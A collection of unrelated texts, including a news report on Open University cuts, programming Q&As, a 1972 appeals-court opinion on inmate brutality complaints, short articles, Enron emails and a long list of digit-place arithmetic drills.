The Guardian has seen confidential documents that spell out proposals for the cuts. Staff have been invited to apply for voluntary redundancy in a programme that launches on 9 April.
Lecturers have said the proposals are so significant they will “destroy the OU as we know it” and reduce it to “a digital content provider”. They have expressed concern about how the changes might affect the quality of degrees offered by the OU.
A document states that the number of courses, qualifications and modules available to students will be reduced by more than a third. It says there will be a smaller workforce, cutting the budget by £15-20m.
“We are sharing this information in strict confidence to give the senior team early sight of the direction of travel,” the document says.
It states that 41 undergraduate and postgraduate degree courses will be axed, leaving 71 degrees available. A range of courses including science, business, music and classics are under threat.
The document includes terms such as “focusing”, “rationalisation” and “consolidation” to describe the fundamental changes being proposed. Of particular concern to lecturers are the plans of how an OU working group hopes to push through the changes.
The Teaching, Excellence and Innovation (TEI) group is driving forward the changes. In January the university senate – the institution’s supreme academic body – declined to give the new vision for the OU the green light before seeing the full implementation plan. The TEI group is exploring alternative ways to get the plans approved if the senate does not approve them at its April meeting.
Lecturers have questioned how the university has been able to spend more than £2.5m on consultancy fees to KPMG at a time when OU chiefs say they are facing severe financial challenges. The information about consultancy fees was disclosed under the Freedom of Information Act.
A spokeswoman for the University and College Union said: “UCU members are hugely concerned at the cuts that are being mooted at the Open University. The proposals under discussion would destroy the OU as we know it, turning it from a world-leading distance education university into a digital content provider. In the process we risk losing the research base that underpins our work with the BBC, and the personal tutorial element that supports our students.
“The branch understands that a very large sum has been set aside which, going by average payments, means voluntary severance is expected for at least 250-300 individuals in the coming year. Staff expect that large-scale compulsory redundancies may follow given the scale of the announced cuts.”
An OU spokesman said: “The Open University must change to deliver its core mission of supporting students from all backgrounds to fulfil their potential through education and to equip them for a fast-evolving world. Our plans will ensure the OU is agile and innovative to meet the needs of students, business and the country for decades to come.”
He added: “We are today announcing a voluntary severance programme. This covers everyone – support staff, professional services teams and much of our academic community (but, to avoid any impact on students, not the tutors who oversee our students’ study).”
The spokesman confirmed there would be a significant reduction in research carried out at the university. “We are sharpening the focus of our research to make sure that it has the maximum value for our students. No decisions on the size of the reduction have been taken. Every aspect of the university’s work – curriculum, teaching, research, back office – is in scope.”
He said no final decision had been taken on the precise reduction in the number of degrees available to students.
Commenting on the consultancy fees paid to KPMG, the spokesman said: “This is a major transformation exercise spanning all the university’s activities. Its breadth and depth required us to draw on the best external expertise as well as skills within the university. We had an existing relationship with KPMG which led to them carrying out the initial phase of work.”
In relation to the senate issue, the spokesman said: “We are not commenting on our internal processes.”
|
{
"pile_set_name": "OpenWebText2"
}
|
Reminiscing on Hood Bush 2013Sitting in my house bored out of my mind on this cold winter day, I figured I would rummage through some of my favorite times last year. Looking through my Hood Bush shots I realized I haven't posted most of these on this blog. I found a few that I have never posted before on any website, social media, or mag. I've been really slacking on this blog and I'm gonna try my hardest to get some stuff on here more. So much stuff is just tied up with exclusive rights to Mags and such. Working on a few shoots for Street Choppers, The Horse BC, and Chop cult in the next few months as well and also I just released a new feature in March's issue of The Horse BC of my friend Mike from Chop Machine's Root beer Sporty build, go check that issue out when you get a chance. The Bike is Called "The Horse With no Name". Thanks again Lisa Ballard for helping me with this one!In other news I am hopefully getting my new camera in the mail tomorrow! So stoked to finally be able to go shoot some stuff again. Went with a Canon 70d for now, because the burst and video stuff integrated in it, along that it was similar to my old camera yet 100% better quality. Late this year the new 7d mark ii comes out and I am definitely grabbing that one. Also I got a ton of new lenses to try out and I can't hardly wait, Spring can not come soon enough to try out some of these super wide angle ones while riding, stoked!!! Other good news, I will be out in Toronto at the end of the month for a Vice Magazine art show that I am going to be featured in with some prints of my work. Pretty amazing feeling to be asked to do that. Last but not least my friend Jarrett asked me to shoot him with his bike for a tattoo/motorcycle book called "In The Wind Book" Look out for that soon! Honored to be apart of that as well!If you have never seen the Chop Cult feature on Hood bush check it out here by clicking the image below.Here is a few images I found today that made me smile, and wish summer was back again.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
Error in event creation using MySQL
Am using the below code to create an EVENT in MYSQL. In this time i want to drop and create a table using a query.
Drop Event if exists EVT_UP_TIMESHEET;
CREATE EVENT EVT_UP_TIMESHEET
ON SCHEDULE EVERY '1' Day
STARTS '2012-08-01 12:00:00'
DO
Drop table if exists tbl_temp;
create table tbl_temp as ( SELECT e.userid AS Employee_ID,
e.memo AS Employee_Name,
e.Department AS Department,
.....
It returns the following error:
ERROR : Table tbl_temp already exists.
Please help me to do this.
A:
As a workaround - try to use TRUNCATE TABLE and INSERT...SELECT statements instead of DROP/CREATE TABLE.
|
{
"pile_set_name": "StackExchange"
}
|
Q:
why we can use code $this-> in system/library/customer.php
Look at the codes below:
public function __construct($registry) {
$this->config = $registry->get('config');
$this->db = $registry->get('db');
$this->request = $registry->get('request');
$this->session = $registry->get('session');
My question is the properties $this->config, $this->db, $this->request and $this->session are not defined at this class. And the Customer class neither inherits from another class not implements __get(),__set() method...
Can someone can explain to me why we can use $this-> here?
A:
That is just a variable which will be Declared and assigned value while Object is created,
try
class Test{
function __construct(){
$this->name = 'Ramesh';
}
}
print_r(new Test());
|
{
"pile_set_name": "StackExchange"
}
|
455 F.2d 798
Robert N. HAYES, Jr., No. 1863, Appellant,v.SECRETARY OF DEPARTMENT OF PUBLIC SAFETY, Appellee.
No. 71-1325.
United States Court of Appeals,Fourth Circuit.
Jan. 25, 1972.
Before WINTER, CRAVEN and BUTZNER, Circuit Judges.
PER CURIAM:
1
Plaintiff, as disclosed by the covering letter of Patuxent Institution transmitting his pro se pleading, is a "patient" at Patuxent Institution. He sued the Secretary of the Maryland Department of Public Safety.1 The Secretary is the head of the department, Ann.Code of Md., Art. 41, Sec. 204 (1971 Replacement Vol.) and the department includes the Patuxent Institution and the Maryland State Police, Ann.Code of Md., Art. 41, Sec. 204A; Art. 31B, Sec. 2; Art. 88B, Sec. 23 (1971 Replacement Vol. and 1971 Supp.). Plaintiff alleged acts of misconduct on the part of the custodial force (presumably of the Institution), i. e., beating a named inmate, using mace and practicing brutality on other named inmates, withholding food from inmates because they protested, stealing food of inmates, beating and chaining two other inmates for misconduct and failing to provide medical treatment to inmates who were ill. Plaintiff alleged that he had requested both the defendant and the State Police at Waterloo, Maryland (a barrack near Patuxent Institution) and, in particular Trooper W. F. Lefevre, to investigate these complaints against the authorities at Patuxent, but that he received no replies. Invoking jurisdiction under 28 U.S.C.A. Sec. 1343, plaintiff prayed an injunction to restrain the State Police "from the continue discriminating against inmates when it comes to filing and investigating complaints of inmates against institution authorities for brutality and violation of the public laws [sic]."
2
The district court allowed the pleading to be filed in forma pauperis, but, without requiring an answer, dismissed it as frivolous. It assigned as reasons for that conclusion:
3
1. No exhaustion of State remedies, administratively, through the appropriate State's Attorney or the Attorney General of Maryland or through the State courts, is alleged.
4
2. No evidence of discrimination is alleged or indicated, in that there is no allegation that similar inquiries made by inmates of other institutions, or by the public at large, have been answered.
5
3. No showing has been made that Trooper Lefevre had any authority to investigate complaints, or to reply to them.
6
4. The court is not aware of any holding that each individual citizen has a civil right to require an answer to any complaint made even with respect to himself, much less others, or to a request for an investigation.
7
We disagree. We reverse the judgment of dismissal and remand for further proceedings.
8
Viewed with the liberality that must be afforded pro se pleadings, plaintiff has alleged a cause of action under 42 U.S.C.A. Sec. 1983, of which the district court had jurisdiction under 28 U.S.C.A. Sec. 1343. In essence plaintiff has alleged a violation of the rights of inmates to be afforded due process and not to be subjected to cruel and unusual punishment and, indeed, plaintiff has also alleged misconduct of the type mounting up to acts made criminal by the law of Maryland, e. g., common law assault and battery. Plaintiff has alleged that he reported the matters both to the defendant and the Maryland State Police and requested an investigation and corrective action. While the district court treated the essence of his complaint as one of the failures of defendant and the police to report to him, we do not read his allegation so technically or so narrowly. Rather, it seems to us that plaintiff is saying that on information and belief nothing has been done. As we will elaborate later, we think that a good cause of action may have been alleged against the police2 and the complaint contains allegations that would support a request for relief against defendant in his administration of Patuxent Institution.
9
We respond to the reasons of the district court for dismissal:
10
1. Exhaustion of state remedies, administratively or through the state courts, is not a prerequisite to the exercise of federal jurisdiction under the Civil Rights Act of 1871. Monroe v. Pape, 365 U.S. 167, 81 S.Ct. 473, 5 L.Ed.2d 492 (1961); Liles v. South Carolina Department of Corrections, 414 F.2d 612 (4 Cir. 1969). See also, Damico v. California, 389 U.S. 416, 417, 88 S.Ct. 526, 19 L.Ed.2d 647 (1967) (per curiam); McNeese v. Board of Educ., 373 U.S. 668, 671-672, 83 S.Ct. 1433, 10 L.Ed.2d 622 (1963) (alternative holding). While Maryland has recently established an Inmate Grievance Commission, Ann. Code of Md., Art. 41, Sec. 204F (1971 Supp.), to determine and recommend the proper redress for meritorious grievances of inmates of Patuxent and other correctional institutions, we take judicial notice of the fact that the Commission is not yet fully operative. When it is, there will be time enough for the Supreme Court to determine if Monroe v. Pape, and, we, our own decisions, should be reexamined. That time is not the present.
11
2. It is true that plaintiff does not specifically allege that charges of law violations by inmates of other institutions or the public at large have been investigated by the Maryland State Police, and that reports of investigations have been made. But, as we have said, we can only conclude that plaintiff is alleging police inaction. Unless we presume that there has been a major breakdown of the police function, we can assume that complaints of law violation by the public at large are investigated where they are as pointed and specific as those alleged by plaintiff, and even that some of the complaining parties do receive some word of the outcome of the investigation. We think that plaintiff has, therefore, indicated discrimination by his allegations.
12
3. Whether Trooper Lefevre has authority to investigate complaints or to reply to them is largely irrelevant, because plaintiff has alleged that he also complained to defendant, the overall administrative head of both Patuxent Institution and the Maryland State Police, who, unquestionably, had authority to act and to direct others to act. At the same time, we would assume that every police officer has authority to receive a report of a violation of law and authority to set in motion a proper investigation of the case.
13
4. While the district court read plaintiff's complaint narrowly to allege that plaintiff was entitled to a report of the investigation he requested, we read it as an allegation, on information and belief, that no investigation was undertaken. When the allegation is so read, plaintiff's theory of his case is novel. It is that the police can investigate charges of brutality and misconduct against correctional officials made by inmates where the alleged brutality and misconduct are a violation of civil rights and are so aggravated as to amount to a violation of state law. We know of no authority to sustain the proposition, yet we are certainly not prepared to reject it summarily, as did the district court, without requiring a responsive pleading and, if there is an issue of fact, an evidentiary hearing. Although under Monroe v. Pape, supra, and its progeny, we think that we presently lack authority to require exhaustion of state remedies, the states are certainly to be encouraged to deal with complaints of institutional brutality through their own police, through their own courts and through their own administrative procedures, rather than to constitute the federal courts the sole instrument for redress of inmates' grievances.
14
Some additional comments should supplement our conclusion that plaintiff has alleged a cause of action immune to summary dismissal. First, it appears that plaintiff may have an additional cause of action under the Civil Rights Act of 1871 against the officials of Patuxent Institution to require that it be administered in such a manner as not to violate the rights of those who are subjected to its treatment. It is true that plaintiff has not alleged that brutality or other misconduct has been practiced on him, but he has, in effect, alleged that he is part of an institutional population which must live from day to day under the constant threat of brutality and misconduct. It would seem, therefore, that plaintiff is "injured," is a member of a class which is "injured" and is thus competent to maintain a class action for himself and others similarly situated. Jackson v. Bishop, 404 F.2d 571 (8 Cir. 1968); Holt v. Sarver, 309 F.Supp. 362 (E.D.Ark.1970), aff'd 442 F.2d 304 (8 Cir. 1971); Morris v. Travisono, 310 F.Supp. 857 (D.R.I. 1971). See, also, Barrows v. Jackson, 346 U.S. 249, 257, 73 S.Ct. 1031, 97 L.Ed. 1586 (1953); Smith v. Board of Education, 365 F.2d 770, 776 (8 Cir. 1966); Gregory v. Litton Systems, Inc., 316 F.Supp. 401, 403-404 (C.D.Cal. 1970); Note, Limiting The Section 1983 Action In The Wake of Monroe v. Pape, 82 Harv.L.Rev. 1486, 1495, 1497 (1969). Second, with regard to the cause of action which plaintiff has alleged, judicial time would be conserved by a sharpening of the allegations and a refinement of the legal theory or theories under which plaintiff proceeds. These considerations lead us to direct that on remand the district court appoint counsel to represent plaintiff and direct that an amended complaint be filed within a reasonable time before a responsive pleading is required. Cf. Holt v. Sarver, 442 F.2d 304, 305 (8 Cir. 1971); Jackson v. Bishop, 404 F.2d 571, 572-573 (8 Cir. 1968).
15
Reversed and remanded.
1
The complete name of the department is Department of Public Safety and Correctional Services
2
Since the complaint was dismissed summarily, we treat as proven the factual allegations therein. Whether the allegations are proven must await the time of trial or proof offered in support of a motion for summary judgment
|
{
"pile_set_name": "FreeLaw"
}
|
Q:
FIPS Certification for Android & iPhone
Does anyone know the name of the cryptography libraries come with iPhone & Android SDKs ? I don't mean the name of the classes, functions etc. but the name of the provider and/or the library itself. Are they FIPS certified?
Thanks
A:
I found out that for Android it's Bouncy Castle and it's not FIPS certified. As for the Apple it's their own implementation and in the process of being FIPS certified according to the NIST's website on the Modules In Process list.
|
{
"pile_set_name": "StackExchange"
}
|
New York’s concrete jungle is about to get more green — and tasty — thanks to Gotham Greens, which is building a hydroponic rooftop farm in Brooklyn. The eco-efficient farm will take a small bite out of the $2 billion in produce that’s trucked into the city each year. Here’s how it works.
1. Power FeedThe $2 million, 16,000-square-foot farm — which opens this spring — is powered by a 60-kilowatt solar-voltaic array.
2. WaterworksA large cistern collects rainwater, which is used for irrigation.
3. Buzz OffBeneficial bugs, such as ladybugs and wasps, are used instead of pesticides to protect crops.
4. Green WheelsProduce is delivered by bicycles or renewable-energy-powered vans, depending on distance and volume.
5. Watery Fields ForeverEverything from bok choy to basil is produced using hydroponics, a soil-free method of farming. “Our plants grow straight from nutrient-filled water,” says CEO Viraj Puri. Hydroponics uses 10 times less water than traditional farming, with higher crop yields.
6. Local HungerOf the 40 tons of expected crops, 70% will head to Whole Foods. The rest will be sold to restaurants and at farmers markets.DM
A version of this article appeared in the May 2010 issue of Fast Company magazine.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Changing a property modifier when merging an interface
The Window interface has a few properties that are readonly:
interface Window extends ... {
// ...
readonly innerHeight: number;
readonly innerWidth: number;
// ...
}
I get that those cannot really be changed, but in my unit tests, I'm changing the values of the object to simulate the changes. And it's an object of that type.
Is there a way I can augment that type in a custom d.ts file and change these properties modifiers?
I tried to just create a .d.ts file with this:
interface Window {
innerHeight: number;
innerWidth: number;
}
But the compiler is complaining with:
All declarations of 'innerWidth' must have identical modifiers.
A:
(I'm pretty sure that) no, you can't change the modifiers or types of existing types.
But as you're only using it for testing then it shouldn't be problematic to cast it to any:
(window as any).innerWidth = 500;
(window as any).innerHeight = 300;
Edit
There's a trick to make a type mutable:
type Mutable<T extends { [x: string]: any }, K extends string> = {
[P in K]: T[P];
}
type MyWindow = Mutable<Window, keyof Window>;
(window as MyWindow).innerWidth = 500;
(window as MyWindow).innerHeight = 300;
(code in playground)
It was suggested in this issue: Mapped Types syntax to remove modifiers, but if it's for testing then this is probably an overkill and casting to any would do the trick (in my opinion).
|
{
"pile_set_name": "StackExchange"
}
|
Q:
Calculate average for specific date range in R
I have two data frames:
Date <- seq(as.Date("2013/1/1"), by = "day", length.out = 17)
x <-data.frame(Date)
x$discharge <- c("1000","1100","1200","1300","1400","1200","1300","1300","1200","1100","1200","1200","1100","1400","1200","1100","1400")
x$discharge <- as.numeric(x$discharge)
And:
Date2 <- c("2013-01-01","2013-01-08","2013-01-12","2013-01-17")
y <- data.frame(Date2)
y$concentration <- c("1.5","2.5","1.5","3.5")
y$Date2 <- as.Date(y$Date2)
y$concentration <- as.numeric(y$concentration)
What I am desperately trying to do is to the following:
In data frame y the first measurement is for the period 2013-01-01 to 2013-01-07
Calculate the average discharge for this period in data frame x
Return the average discharge to data frame y in a new column next to the first measurement and continue with the next measurement
I was having a look into function such as dplyr or apply but was not able to figure it out.
A:
library(dplyr)
x %>%
mutate(period = cut(as.Date(Date), c(as.Date("1900-01-01"), as.Date(y$Date2[-1]), as.Date("2100-01-01")), c(1:length(y$Date2)))) %>%
group_by(period) %>%
mutate(meandischarge = mean(discharge, na.rm = T)) %>%
right_join(y, by = c("Date" = "Date2"))
Date discharge period meandischarge concentration
<date> <dbl> <fctr> <dbl> <dbl>
1 2013-01-01 1000 1 1214.286 1.5
2 2013-01-08 1300 2 1200.000 2.5
3 2013-01-12 1200 3 1200.000 1.5
4 2013-01-17 1400 4 1400.000 3.5
If you only want the original y variables, you could do this:
x %>%
mutate(period = cut(as.Date(Date), c(as.Date("1900-01-01"), as.Date(y$Date2[-1]), as.Date("2100-01-01")), c(1:length(y$Date2)))) %>%
group_by(period) %>%
mutate(meandischarge = mean(discharge, na.rm = T)) %>%
ungroup() %>%
right_join(y, by = c("Date" = "Date2")) %>%
select(Date2 = Date, concentration, meandischarge)
Date2 concentration meandischarge
<date> <dbl> <dbl>
1 2013-01-01 1.5 1214.286
2 2013-01-08 2.5 1200.000
3 2013-01-12 1.5 1200.000
4 2013-01-17 3.5 1400.000
|
{
"pile_set_name": "StackExchange"
}
|
Pediatric neurosurgery.
Randomized controlled trials of neurosurgical procedures involving children have been organized infrequently; as a consequence, the majority of pediatric neurosurgical practice is not supported by class I data. Furthermore, many trials that have been reported suffer from serious methodological shortcomings such as insufficient power and poor statistical analysis. Finally, several trials of neurosurgical techniques that are frequently performed on children have either excluded children from participation or include an insufficient number of children to draw strong conclusions. Despite these shortcomings, pediatric neurosurgery, like all fields in medicine, is gradually moving towards a more stringent evidence-based medicine standard. This chapter will attempt to summarize the recent progress that has been made in this area.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Notothenia coriiceps
Notothenia coriiceps, also known as the black rockcod, Antarctic yellowbelly rockcod, or Antarctic bullhead notothen, is a species of notothen that is widely spread around the Antarctic continent. Like other Antarctic notothenioid fishes, N. coriiceps evolved in the stable, ice-cold environment of the Southern Ocean. It is not currently targeted by commercial fisheries.
Distribution and diet
N. coriiceps maintains a circum-Antarctic distribution that is likely governed at least in part by the presence of the Antarctic Circumpolar Current (ACC) as well as its egg dispersal patterns. Populations of this species have been recorded at sites in the western Ross Sea, the Weddell Sea, the Western Antarctic Peninsula, the islands of the Scotia Arc to South Georgia, the Balleny Islands, and the sub-Antarctic islands of the Indian Ocean sector. N. coriiceps feeds on macroalgae amphipods and euphausiids. It appears to feed year-round, although diet composition likely varies seasonally.
Morphology
N. coriiceps members have scales that typically appear brown or gray in color. Its teeth consist of a multi-row tooth plate and caniform teeth, which are located in the outer portion of the jaw. Adults males typically reach a length of approximately 50 cm (20 in).
Like many other notothenioid fishes, it lacks a swim bladder. Bone density increases during maturation, resulting in reduced buoyancy and the transition from pelagic to desmersal swimming behavior. Adults N. coriiceps possess a dense, well-developed skeleton compared to its congener Notothenia rossii, accounting for its reduced buoyancy.
Its epithelium is characterized by the presence of fat droplets, which serve as a storage mechanism for dietary lipids. Fat droplets are also stored in bone tissue.
Physiology
Like most other Antarctic notothenioids, N. coriiceps exhibits several adaptations that optimize organismal performance at subzero temperatures. These include a modified heat shock response, the production of antifreeze glycoproteins that prevent ice crystallization of body fluids at subzero temperatures, and the abundance of polyunsaturated fatty acids that allow cells to maintain membrane fluidity. N. coriiceps has an limited tolerance for acute temperature change but has demonstrated the capacity to extend its thermal limits upon long-term acclimation to warmer temperatures.
Genome
The N. coriiceps genome was sequenced in 2014. Results indicated rapid evolution of genes during speciation, especially in proteins that code for mitochondrial proteins and hemoglobin. In addition, the authors found that many N. coriiceps genes are reflective of adaptation to cold temperatures, with specialized genes related to the species' modified heat shock response as well as enhanced oxidative phosphorylation at cold temperatures.
References
Category:Nototheniidae
Category:Fish of the Southern Ocean
Category:Taxa named by John Richardson (naturalist)
Category:Fish described in 1844
|
{
"pile_set_name": "Wikipedia (en)"
}
|
19 Facts You (Probably) Didn't Know About 'LUV' Rapper Tory Lanez
What happened between him and Drake?
When he was 17-years-old, Tory sent his 'Play For Keeps' mixtape to Drake, betting Drizzy $10k if he wasn’t impressed. However Drake never got back to him, sparking the pair's six year rivalry. Drake took a dig at Tory in 'Summer Sixteen', whilst Tory hit back claiming calling Toronto 'The Six' wasn't cool. Picture: PA
|
{
"pile_set_name": "Pile-CC"
}
|
I have to move some final things out of my old house. I hope I close
tomorrow! If you would like to meet me at my new house, and then we could
run over quick and grab the final things I could go after...
"Patti Young" <pyoung@pdq.net>
06/21/2000 07:08 PM
To: <tana.jones@enron.com>
cc:
Subject: Wednesdsay
If you don't have dinner plans, would you like to eat out somewhere this
evening??
I will be here a few more minutes.
?
?
|
{
"pile_set_name": "Enron Emails"
}
|
Sydney councils are continuing to shut beaches and urging those wanting to exercise to stay away from busy coastal walking tracks during the Easter long weekend.
Amid warnings for residents to stay home in a bid to slow the spread of coronavirus, councils and police have intensified patrols at beaches, parks, and common exercise routes from Dee Why to Cronulla.
Beaches at Cronulla in Sydney's south are closed until midnight on Monday, in a bid to deter crowds during the weekend. Credit:Rhett Wyman
Sydney's busiest beaches were thrust into the spotlight after thousands of people flocked to Bondi as the state government tried to enforce social distancing measures.
This weekend's closures affect the majority of beaches from Dee Why and Manly in the north, to Bondi and Coogee in the east, and south to Sans Souci and South Cronulla. Many are set to reopen at midnight on Monday.
|
{
"pile_set_name": "OpenWebText2"
}
|
[Oxaliplatin and genito-urinary tumors].
Considering genito-urinary tumors, the use of oxaliplatin should be restricted to clinical trials since no marketing approval has been obtained. Results of prospective studies currently suggest that the development of oxaliplatin should be carried on with first-line management of poor prognosis metastatic germ cell tumors as well as metastatic bladder cancer patients not eligible for cisplatin therapy.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
Strophe MAM how to display the messages?
I have managed to use Strophe MAM to get the archived messages into the RAWInput, and display the last message(but only the last one). How do i display all the messages from the RAWInput?? But not just the last one?
And how do i extract who the message is from?
I have limited the messages to the last 5.
connection.mam.query("test3@macbook-pro.local", {
"with": "test4@macbook-pro.local","before": '',"max":"5",
onMessage: function(message) {
console.log( $(message).text());
},
onComplete: function(response) {
console.log("Got all the messages");
}
});
A:
You can get all the messages using the `strophe.mam.js plugin
Here is my working code:
// Retrives the messages between two particular users.
var archive = [];
var q = {
onMessage: function(message) {
try {
var id = message.querySelector('result').getAttribute('id');
var fwd = message.querySelector('forwarded');
var d = fwd.querySelector('delay').getAttribute('stamp');
var msg = fwd.querySelector('message');
var msg_data = {
id:id,
with: Strophe.getBareJidFromJid(msg.getAttribute('to')),
timestamp: (new Date(d)),
timestamp_orig: d,
from: Strophe.getBareJidFromJid(msg.getAttribute('from')),
to: Strophe.getBareJidFromJid(msg.getAttribute('to')),
type: msg.getAttribute('type'),
body: msg.getAttribute('body'),
message: Strophe.getText(msg.getElementsByTagName('body')[0])
};
archive.val(archive.val() + msg_data.from + ":" + msg_data.message + "\n" + msg_data.to + ":" + msg_data.message + "\n");
archive.scrollTop(archive[0].scrollHeight - archive.height());
console.log('xmpp.history.message',msg_data.message);
} catch(err){
if(typeof(err) == 'TypeError'){
try {
console.log(err.stack)
} catch(err2){
console.log(err,err2);
}
}
}
return true;
},
onComplete: function(response) {
console.log('xmpp.history.end',{query:q, response:response});
}
};
$(document).ready(function)(){
archive = $("#archive-messages");
archive.val("");
$("#to-jid").change(function() {
$("#archive-messages").val("");
var to = {"with": $(this).val()};
$.extend(q, to, before, max);
// It takes around 800ms to auto login. So after this timeout we have to retrieve the messages of particular User.
setTimeout(function(){
connection.mam.query(Strophe.getBareJidFromJid(connection.jid), q);
}, 1000);
});
});
|
{
"pile_set_name": "StackExchange"
}
|
10 competitions humans fought against machines
In 1981, science essayist Jeremy Bernstein wrote a piece for The New Yorker that touched upon a historic backgammon game two years earlier, in which reigning champ Luigi Villa lost to a computer. It was the first time an artificial-intelligence program had defeated a world champion at a board or card game. In the essay, Bernstein wrote: “What does this mean for us, for our sense of uniqueness and worth — especially as machines evolve whose output we can less and less distinguish from our own?” He might have asked that decades ago, but the question is now more relevant than ever. Google’s AlphaGo recently won four out of five matches against Go master Lee Se-dol. And that’s just the latest example: In the intervening years since Villa’s loss, humans…
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Parâmetro na URL da página
Caros, preciso criar uma aplicação pyramid para uso da API.
1 - “/quotes/< quote_number>” - Apresentar página contendo o quote retornado pela API correspondente ao < quote_number >.
Já sei como criar uma página estatíca em Pyramid, mas não sei como criar uma página que recebe o parâmetro na url.
A:
Dado o conteúdo desta página, basta você definir o parâmetro na URL entre chaves, tal como {parametro} e utilizá-lo através de request.matchdict. Veja um exemplo:
@view_config(route_name='quotes_number')
def quotes_number(request):
return Response(request.matchdict['quote_number'])
config.add_route('quotes_number', 'quotes/{quote_number}')
|
{
"pile_set_name": "StackExchange"
}
|
Pilsbry was among the most productive taxonomists
ever to pick up a magnifying glass; in all he published some three thousand
articles (around twelve hundred in his journal Nautilus alone)
and described and named going on six thousand forms. Pilsbry's immersion
in the world of shelled creatures was so intense and over such a long
period (he published writings in a total of eight decades) that he became
a veritable institution. He worked on both freshwater and marine organisms,
extant and extinct species, and American and foreign forms. Further, his
studies extended beyond mere descriptive work; he was interested in ecology
and biogeography as well, and made contributions relevant to oil exploration
activities and epidemiology. In addition to his attention to molluscs,
Pilsbry was also the leading expert on barnacles. Pilsbry spent many an
hour in his lab at the Academy of Natural Sciences, but he actually also
spent a fair amount of time in the field, collecting specimens in the
U.S., Hawaii, Central and South America, the West Indies, the Galapagos
Islands, Japan, Australia, and various South Pacific islands.
|
{
"pile_set_name": "Pile-CC"
}
|
THE LOCATION HAS CHANGED 50th Floor Boardroom - Enron Building with Video
link to London The meeting begins at 8:30 (Breakfast will be provided).
PLEASE SEND A LIST OF ANY ATTENDEES FROM YOUR GROUP OTHER THAN YOURSELF. WE
NEED THIS INFORMATION BY 2:00 PM TODAY.
MESSAGE FROM RICK
You must come to the meeting with the following distribution of you people:
Superior 5% Excellent 30% Strong 30%
Satisfactory 20% Needs Improvement and Issues 15%
|
{
"pile_set_name": "Enron Emails"
}
|
Sooner or later, every programmer ends up searching for code snippets and algorithms. Most search engines, though, don’t exactly specialize in code search and so you end up with a couple of links (one of them most likely to StackOverflow). Now, Microsoft has partnered with HackerRank to bring code snippets right into its Bing search results pages — and as an added twist, you can also edit and execute this code right on those pages, too.
To trigger this, all you have to do is search for something like “string concat C#” or a similar question and Bing will pop up the editor for you. Using the widget, you can also switch to other languages as well. Depending on the algorithm you’re looking for, the options here include C, C++, C#, Python, PHP, and Java.
HackerRank co-founder Vivek Ravisankar tells me the project currently features over 80 code snippets that focus on the most commonly searched terms.
Microsoft is positioning this as both a productivity and learning tool.
“In addition to learning how a certain algorithm/code is written in a given language, users will also be able to check how the same solution is constructed in a range of other programming languages too — providing a Rosetta-stone model for programming languages,” says Marcelo De Barros, Group Engineering Manager for the UX Features and Shared Tools at Bing.
If you’re a Visual Studio user, it’s also worth checking out Microsoft’s Developer Assistant plugin (previously known as the Bing Code Search add-on), which allows you to find and reuse over 21 million code snippets and samples right from within the IDE.
|
{
"pile_set_name": "OpenWebText2"
}
|
at is the thousands digit of 18466?
8
What is the units digit of 1104?
4
What is the units digit of 102?
2
What is the hundreds digit of 792?
7
What is the thousands digit of 5096?
5
What is the thousands digit of 62220?
2
What is the units digit of 81092?
2
What is the units digit of 132696?
6
What is the units digit of 1967?
7
What is the thousands digit of 12910?
2
What is the hundreds digit of 433?
4
What is the tens digit of 1548?
4
What is the ten thousands digit of 21206?
2
What is the tens digit of 125?
2
What is the tens digit of 14063?
6
What is the thousands digit of 45025?
5
What is the units digit of 1449?
9
What is the tens digit of 4579?
7
What is the hundreds digit of 2933?
9
What is the thousands digit of 45693?
5
What is the hundreds digit of 1774?
7
What is the hundreds digit of 9675?
6
What is the units digit of 1936?
6
What is the ten thousands digit of 13575?
1
What is the thousands digit of 1469?
1
What is the tens digit of 77186?
8
What is the hundreds digit of 58516?
5
What is the tens digit of 36304?
0
What is the thousands digit of 1733?
1
What is the ten thousands digit of 29993?
2
What is the tens digit of 9385?
8
What is the hundreds digit of 8774?
7
What is the tens digit of 7496?
9
What is the units digit of 1586?
6
What is the hundreds digit of 167?
1
What is the units digit of 289?
9
What is the units digit of 18833?
3
What is the hundreds digit of 927?
9
What is the units digit of 559?
9
What is the units digit of 1987?
7
What is the hundreds digit of 59067?
0
What is the tens digit of 22603?
0
What is the thousands digit of 1086?
1
What is the hundreds digit of 11860?
8
What is the ten thousands digit of 23076?
2
What is the tens digit of 7891?
9
What is the ten thousands digit of 11525?
1
What is the ten thousands digit of 15402?
1
What is the thousands digit of 1623?
1
What is the hundreds digit of 10652?
6
What is the tens digit of 17888?
8
What is the thousands digit of 39613?
9
What is the ten thousands digit of 40001?
4
What is the thousands digit of 5653?
5
What is the ten thousands digit of 30308?
3
What is the units digit of 1675?
5
What is the tens digit of 1378?
7
What is the units digit of 5290?
0
What is the ten thousands digit of 109588?
0
What is the units digit of 10206?
6
What is the units digit of 1281?
1
What is the ten thousands digit of 13825?
1
What is the ten thousands digit of 41241?
4
What is the units digit of 125?
5
What is the ten thousands digit of 19421?
1
What is the tens digit of 19943?
4
What is the hundreds digit of 1204?
2
What is the hundreds digit of 3586?
5
What is the units digit of 26328?
8
What is the tens digit of 27213?
1
What is the units digit of 2566?
6
What is the tens digit of 62?
6
What is the hundreds digit of 774?
7
What is the hundreds digit of 860?
8
What is the tens digit of 73?
7
What is the hundreds digit of 144049?
0
What is the tens digit of 109771?
7
What is the tens digit of 7338?
3
What is the tens digit of 22254?
5
What is the units digit of 170520?
0
What is the tens digit of 395?
9
What is the thousands digit of 2179?
2
What is the ten thousands digit of 29549?
2
What is the hundreds digit of 202?
2
What is the units digit of 995?
5
What is the ten thousands digit of 45774?
4
What is the thousands digit of 1296?
1
What is the hundreds digit of 19528?
5
What is the thousands digit of 8525?
8
What is the tens digit of 126103?
0
What is the tens digit of 439?
3
What is the units digit of 3499?
9
What is the ten thousands digit of 93691?
9
What is the hundreds digit of 113704?
7
What is the ten thousands digit of 85069?
8
What is the tens digit of 2912?
1
What is the ten thousands digit of 22936?
2
What is the units digit of 2410?
0
What is the tens digit of 4225?
2
What is the thousands digit of 98766?
8
What is the units digit of 1485?
5
What is the ten thousands digit of 57979?
5
What is the units digit of 20804?
4
What is the units digit of 34943?
3
What is the tens digit of 2913?
1
What is the units digit of 43638?
8
What is the tens digit of 706?
0
